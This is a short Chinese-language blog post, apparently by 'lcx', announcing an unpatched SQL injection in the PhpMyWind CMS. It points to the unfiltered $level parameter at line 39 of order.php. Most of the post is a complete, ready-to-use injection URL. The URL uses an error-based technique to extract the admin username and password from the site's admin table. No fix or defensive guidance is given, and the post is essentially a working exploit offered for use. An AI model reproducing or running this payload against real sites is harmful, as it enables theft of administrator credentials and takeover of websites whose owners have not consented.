PhpMyWind SQL Injection 的另一个0day

order.php第39行

$sql = “SELECT * FROM `#@__cascadedata` WHERE level=$level And “;$level没有过滤

直接提交
[php]
http://xxx.com/phpmywind/order.php?action=getarea&level=1%20%20or%20@`\’`=1%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),0x7e,(substring((Select%20concat(username,0x7e,password)%20from%20`%23@__admin`),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20@`\’`=0%23[/php]

作者:lcx

发表评论